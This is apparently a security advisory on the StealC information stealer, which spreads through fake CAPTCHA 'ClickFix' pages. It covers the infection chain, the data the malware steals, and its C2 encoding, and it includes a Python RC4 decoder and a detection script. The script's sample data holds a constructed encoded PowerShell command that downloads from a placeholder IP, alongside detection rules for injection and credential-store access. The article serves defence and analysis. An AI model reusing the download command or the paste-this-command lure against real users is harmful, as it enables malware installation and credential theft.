StealC Malware Exploits Fake CAPTCHA Pages to Infect Windows Users with Information-Stealing Software

StealC Malware Targets Windows Users via Deceptive CAPTCHA Pages

A sophisticated cyberattack campaign is currently targeting Windows users by exploiting fake CAPTCHA verification pages to deploy the StealC information-stealing malware. This campaign combines social engineering tactics with advanced technical methods to extract sensitive data from unsuspecting victims.

Attack Overview

The attack initiates when users visit compromised websites that display fraudulent Cloudflare security checks. These deceptive pages prompt users to perform a series of actions:

1. Press the Windows Key + R to open the Run dialog box.

2. Press Ctrl + V to paste a command that has been silently copied to the clipboard.

3. Press Enter to execute the command.

This method, known as the ClickFix technique, manipulates users into believing they are completing a routine security verification, while in reality, they are initiating the installation of malicious software.

Infection Chain and Evasion Tactics

Once the user executes the command, a multi-stage infection process begins:

1. Shellcode Execution: The initial command connects to a remote server to download position-independent shellcode generated using the Donut framework.

2. PE Downloader Deployment: The shellcode loads a custom Portable Executable (PE) downloader compiled with Microsoft Visual C++.

3. StealC Malware Injection: The downloader retrieves the final StealC payload and injects it into ‘svchost.exe,’ a legitimate Windows service process.

The later stages are fetched and executed in memory rather than written to disk, so the chain leaves few file artefacts and gives file-scanning antivirus little to inspect. It is not invisible, though: the pasted command still shows up as a process-creation event with the Run dialog's host process as its parent, and each stage still has to cross the network to be downloaded.

StealC Malware Capabilities

StealC is a potent information stealer with the following capabilities:

– Credential Theft: Extracts login credentials from browsers such as Chrome, Edge, and Firefox.

– Cryptocurrency Wallet Access: Targets wallet extensions including MetaMask and Coinbase Wallet.

– Email Data Extraction: Harvests Outlook email credentials.

– System Information Collection: Gathers comprehensive system data and captures screenshots.

The malware talks to its command-and-control (C2) server over HTTP; message bodies are RC4-encrypted and then Base64-encoded. Base64 is an encoding, not encryption, so the only secret in that scheme is the RC4 key, and that key has to be present in the sample. Strings that configure the stealer, including the C2 server URL, the file paths it targets and the database queries it runs against browser stores, are protected by a two-layer string obfuscation scheme so they do not appear in clear text in the binary.
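To make the "RC4 plus Base64" framing concrete, here is a small decoder of the kind an analyst writes once the key has been pulled from a sample. This is an added example, not StealC's code or real traffic: the key, the beacon string and the captured body are all constructed here, and the real key is whatever the sample embeds.

```python
"""Decoder for the C2 framing described above: RC4 encryption wrapped in
Base64. Added example; the key and the captured body are constructed and are
not StealC's real key or traffic."""
import base64


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same call."""
    # Key-scheduling algorithm: permute the state array with the key
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    # Pseudo-random generation algorithm, XORed byte by byte over the data
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def encode_c2(key: bytes, plaintext: bytes) -> str:
    """What the implant puts on the wire: RC4 first, then Base64 for text safety."""
    return base64.b64encode(rc4(key, plaintext)).decode("ascii")


def decode_c2(key: bytes, body: str) -> bytes:
    """Reverse the framing on a captured HTTP body. Base64 adds no secrecy;
    only the RC4 key matters, and the key is recoverable from the sample."""
    return rc4(key, base64.b64decode(body))


# Constructed values: an assumed key and a fake beacon string (not real data).
ASSUMED_KEY = b"example-key"
SAMPLE_BEACON = b"machine=WIN-TEST|user=alice|build=demo"
SAMPLE_BODY = encode_c2(ASSUMED_KEY, SAMPLE_BEACON)

if __name__ == "__main__":
    print("on the wire:", SAMPLE_BODY)
    print("recovered  :", decode_c2(ASSUMED_KEY, SAMPLE_BODY))
```

The same two-step decode applies to the obfuscated configuration strings once the key and layering order are known from the sample; a wrong key yields bytes that look random rather than an error, so check the output against expected structure (a URL, a path, a SQL statement) rather than trusting that decryption "succeeded".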

Detection and Mitigation Strategies

To defend against such sophisticated attacks, organizations should implement the following measures:

– Monitor User-Agent Strings: Alert on non-browser User-Agent values such as Loader, particularly when the request comes from a script host like powershell.exe rather than from a browser.

– Flag PowerShell Executions: Alert on powershell.exe launched with an encoded command (-EncodedCommand or its short forms such as -enc), and weight the alert higher when the parent process is explorer.exe, which is what a command pasted into the Run dialog looks like in process telemetry.

– Detect Shellcode Injection Patterns: Watch for the allocate-then-execute sequence (VirtualAlloc followed by CreateThread), or its cross-process equivalents (VirtualAllocEx, WriteProcessMemory, CreateRemoteThread) when a payload is placed into another process such as svchost.exe.

– Monitor Access to Credential Databases: Alert when a process other than the browser itself reads browser credential stores (for example the Chromium "Login Data" SQLite database), since that is exactly what the credential-theft stage has to do.
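The following added example turns the Run-dialog chain from the attack overview and the four checks above into a small detection pass over constructed, Sysmon-shaped events. It is not the page's or any vendor's code; the event layout, the rule names, the 203.0.113.5 address (an RFC 5737 documentation range) and the sample command are all assumptions made for illustration.

```python
"""Toy detection pass for the ClickFix -> StealC chain described above.

All events below are constructed sample telemetry (roughly Sysmon-shaped);
they are not real logs from the campaign.
"""
import base64
import binascii
import re

# Constructed plaintext for the sample encoded command. 203.0.113.5 is an
# RFC 5737 documentation address, not a real C2 host.
SAMPLE_PLAINTEXT = "iwr http://203.0.113.5/stage1 -UseBasicParsing"
# PowerShell's -EncodedCommand takes Base64 of the UTF-16LE script text.
SAMPLE_B64 = base64.b64encode(SAMPLE_PLAINTEXT.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    # What the Run dialog produces when the user pastes and hits Enter:
    # explorer.exe (which hosts the Run dialog) spawns the pasted command.
    {"type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": f"powershell.exe -w hidden -enc {SAMPLE_B64}"},
    # Benign admin activity from a console window: should not be flagged.
    {"type": "process", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\deploy.ps1"},
    # Outbound request carrying the bare User-Agent called out above.
    {"type": "http", "process": "powershell.exe", "user_agent": "Loader",
     "url": "http://203.0.113.5/stage2"},
    {"type": "http", "process": "msedge.exe",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ...",
     "url": "https://example.com/"},
    # API trace from the injected service host: allocate, copy, run a thread.
    {"type": "api", "process": "svchost.exe",
     "calls": ["VirtualAlloc", "RtlMoveMemory", "CreateThread"]},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings seen most often. Extend for whatever your telemetry shows.
_ENC_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
_INTERACTIVE_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
_BAD_USER_AGENTS = {"loader"}  # the indicator named on the page; tune locally


def decode_encoded_command(cmdline):
    """Return the script hidden behind -enc/-EncodedCommand, or None."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # not a well-formed encoded command


def detect(events):
    """Apply the four checks from the mitigation list; return a list of alerts."""
    alerts = []
    for ev in events:
        if ev["type"] == "process":
            # Run-dialog launches show explorer.exe as the parent.
            if (ev["parent"].lower() == "explorer.exe"
                    and ev["image"].lower() in _INTERACTIVE_SHELLS):
                alerts.append({"rule": "run_dialog_spawn", "detail": ev["cmdline"]})
            decoded = decode_encoded_command(ev["cmdline"])
            if decoded is not None:
                alerts.append({"rule": "encoded_powershell", "detail": decoded})
        elif ev["type"] == "http":
            if ev["user_agent"].strip().lower() in _BAD_USER_AGENTS:
                alerts.append({"rule": "suspicious_user_agent", "detail": ev["url"]})
        elif ev["type"] == "api":
            calls = ev["calls"]
            # VirtualAlloc followed (not necessarily immediately) by CreateThread
            # is the in-memory execution sequence named in the list above.
            if ("VirtualAlloc" in calls
                    and "CreateThread" in calls[calls.index("VirtualAlloc"):]):
                alerts.append({"rule": "inmemory_exec_pattern", "detail": ev["process"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert['rule']:24} {alert['detail']}")
```

Two of the four rules fire on the very first event, which is the point: the pasted command is the loudest moment in the chain, before anything has been decoded or injected. The encoded-command decoder also gives the analyst the plaintext to pivot on (the download URL) without having to run the script.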

User Awareness and Training

Educating users about the risks of executing commands from untrusted sources is crucial. No legitimate CAPTCHA or site verification asks a visitor to open the Run dialog, paste a command, or run anything outside the browser; users should be trained to treat any page that does so as malicious, to stop at that point, and to report it rather than complete the steps.

Conclusion

The current wave of ClickFix attacks deploying StealC malware underscores the evolving nature of cyber threats that blend social engineering with technical sophistication. By staying informed about these tactics and implementing robust detection and mitigation strategies, organizations can better protect their systems and sensitive data from such insidious attacks.